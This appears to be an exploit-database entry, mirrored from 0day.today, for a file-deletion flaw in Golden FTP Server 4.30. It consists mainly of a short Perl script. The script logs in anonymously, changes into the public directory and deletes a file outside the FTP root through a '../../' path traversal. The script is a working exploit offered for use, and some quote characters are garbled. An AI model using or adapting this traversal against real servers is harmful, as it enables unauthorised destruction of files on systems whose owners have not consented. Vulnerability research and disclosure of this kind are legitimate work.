Golden FTP Server 4.30 File Deletion Vulnerability

==================================================
Golden FTP Server 4.30 File Deletion Vulnerability
==================================================


# Title: Golden FTP Server 4.30 File Deletion Vulnerability
# CVE-ID: ()
# OSVDB-ID: ()
# Author: sharpe
# Published: 2009-12-01
# Verified: yes

view source
print?
# Exploit Title: [Golden FTP Server File Deletion Vulnerability]
# Date: [18.11.2009]
# Author: [sharpe]
# Version: [4.30 Free and Professional]
# Tested on: [Windows XP SP3]
# CVE : [if exists]
 
#---
#sat0ri - sudden enlightenment
#http://blog.sat0ri.com/
 
use strict;
use Net::FTP
 
my $ftp = Net::FTP->new(”192.168.1.35″, Debug => 1) || die [email protected];
 
$ftp->login(”anonymous”, ‘[email protected]’) || die $ftp->message;
 
# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(”/public/”) || die $ftp->message;
 
# This deletes the file C:\bollocks.txt
$ftp->delete(”../../bollocks.txt”);
 
$ftp->quit;
 
$ftp = undef;



#  0day.today [2018-02-16]  #